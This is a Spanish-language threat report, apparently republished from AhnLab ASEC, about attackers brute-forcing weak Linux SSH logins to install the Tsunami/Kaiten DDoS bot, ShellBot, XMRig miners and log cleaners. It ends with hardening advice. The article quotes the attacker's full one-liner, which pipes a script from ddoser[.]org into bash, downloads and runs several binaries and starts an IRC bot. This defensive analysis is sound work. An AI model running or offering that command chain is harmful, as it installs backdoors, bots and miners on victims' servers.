Tsunami DDoS: botnet distribuida a servidores Linux SSH
AhnLab Security Emergency Response Center (ASEC)
descubrió
recientemente una campaña que consiste en la instalación de Tsunami DDoS Bot
en servidores Linux SSH administrados de manera inadecuada. El actor de
amenazas no solo instaló Tsunami, sino que también instaló varios otros
programas maliciosos como ShellBot, XMRig CoinMiner y Log Cleaner.
Al observar los casos de ataque contra servidores Linux SSH mal administrados,
la mayoría de ellos involucran la instalación de bots DDoS o CoinMiners. El
bot DDoS se ha cubierto aquí en el blog de ASEC antes a través de los casos de
ataque donde se instalaron
ShellBot
y
ChinaZ DDoS Bot. La instalación de XMRig CoinMiner se cubrió junto con el
malware SHC
y la campaña de ataque
KONO DIO DA
Tsunami es un bot DDoS que también se conoce como Kaiten. Es una de las varias
cepas de malware que se han distribuido constantemente junto con
Mirai
y Gafgyt cuando se dirigen a dispositivos IoT que generalmente son
vulnerables. Si bien todos comparten el terreno común de ser bots DDoS,
Tsunami se destaca de los demás en que opera como un bot IRC, utilizando IRC
para comunicarse con el actor de amenazas.
Funcionalidades
ASEC observó que los intrusos también generaron un nuevo par de claves SSH públicas y privadas para que el servidor violado mantuviera el acceso incluso si se cambiaba la contraseña del usuario.
El malware descargado en hosts comprometidos incluye botnets DDoS, limpiadores de registros, mineros de criptomonedas y herramientas de escalamiento de privilegios.
Comenzando con ShellBot, este bot DDoS basado en Perl utiliza el protocolo IRC para la comunicación. Admite escaneo de puertos, UDP, TCP y ataques de inundación HTTP y también puede configurar un shell inverso. El otro malware de botnet DDoS visto en estos ataques es Tsunami, que también utiliza el protocolo IRC para la comunicación.
La versión particular vista por ASEC es «Ziggy», una variante de Kaiten. Tsunami persiste entre reinicios al escribirse en «/etc/rc.local» y usa nombres de procesos de sistema típicos para ocultarse.
Código fuente
El código fuente de Tsunami está disponible públicamente, por lo que es
utilizado por una multitud de actores de amenazas. Entre sus diversos usos, se
utiliza mayoritariamente en ataques contra dispositivos IoT. Por supuesto,
también se usa constantemente para apuntar a servidores Linux. Además, similar
al caso en el que XMRig CoinMiner se distribuyó a un contenedor Docker público
con Tsunami, se confirmó otro caso en el que también se distribuyeron a un
entorno de nube. Además, la inclusión de malware dentro de contenedores Docker
distribuidos no oficialmente es uno de sus principales vectores de ataque.
1. Ataque de diccionario contra servidores Linux SSH
Si se utilizan credenciales de cuenta simples (ID/PW) en un sistema Linux, un
actor de amenazas puede iniciar sesión en el sistema a través de la fuerza
bruta o un ataque de diccionario, lo que le permite ejecutar comandos
maliciosos.
2. Flujo de ataque
Después de iniciar sesión con éxito, el actor de amenazas ejecuta un comando
como el siguiente para descargar y ejecutar varios programas maliciosos.
# nvidia-smi –list-gpus | grep 0 | cut -f2 -d: | uniq -c;nproc;ip a |
grep glo;uname -a;cd /tmp;wget -O – ddoser[.]org/key|bash;cd /var/tmp;wget ddoser[.]org/a;chmod +x a;
./a;wget ddoser[.]org/logo;perl logo irc.undernet.org 6667 -bash;rm -rf logo;wget ddoser[.]org/top;
tar -zxvf top;rm -rf top;cd lib32;./go > /dev/null 2>&1 &
Entre el malware que se instala, el archivo "key" es un
Script Bash que instala otros malware adicionales. Además de ser un
descargador, también realiza varias tareas preliminares para controlar los
sistemas infectados, lo que incluye la instalación de una cuenta SSH de puerta
trasera.
Análisis de malware Tsunami
Como el malware de bot DDoS también conocido como Kaiten, Tsunami es utilizado
por varios actores de amenazas ya que su código fuente está disponible
públicamente. Los actores de amenazas a menudo modifican el código fuente del
Kaiten existente para agregar más funciones, y el Tsunami utilizado en este
ataque es una variante de Kaiten llamada Ziggy. Al comparar las explicaciones
que se muestran en el comando de ayuda real, son idénticas al código fuente.
Esta
publicación de Ahnlab
cubrirá un caso en el que un actor de amenazas logró iniciar sesión en
servidores SSH mal administrados después de realizar ataques de diccionario,
lo que luego fue seguido por la instalación de DDoS Bots y XMRig CoinMiner.
Además de los ataques DDoS SYN, ACK, UDP y de inundación aleatoria, Tsunami también admite un amplio conjunto de comandos de control remoto, incluida la ejecución de comandos de shell, shells inversos, recopilación de información del sistema, actualización y descarga de cargas útiles adicionales desde una fuente externa.
Log Cleaner
Luego están MIG Logcleaner v2.0 y Shadow Log Cleaner, ambas herramientas utilizadas para borrar la evidencia de intrusión en computadoras comprometidas, lo que hace que sea menos probable que las víctimas se den cuenta de la infección rápidamente.
Estas herramientas admiten argumentos de comando específicos que permiten a los operadores eliminar registros, modificar registros existentes o agregar nuevos registros al sistema.
Escalamiento de privilegios
El malware de escalamiento de privilegios utilizado en estos ataques es un archivo ELF (formato ejecutable de Linux) que eleva los privilegios del atacante a los de un usuario root.
Finalmente, los actores de amenazas activan un minero de monedas XMRig para secuestrar los recursos computacionales del servidor para extraer Monero en un grupo específico.
Para defenderse de estos ataques, los usuarios de Linux deben usar contraseñas de cuenta seguras o, para mayor seguridad, requerir claves SSH para iniciar sesión en el servidor SSH.
Además, se debe deshabilitar el inicio de sesión root a través de SSH, limitar el rango de direcciones IP permitidas para acceder al servidor y cambiar el puerto SSH predeterminado a algo atípico que los bots automatizados y los scripts de infección no conocen.
Source: Seguridad Informatica
{$excerpt:n}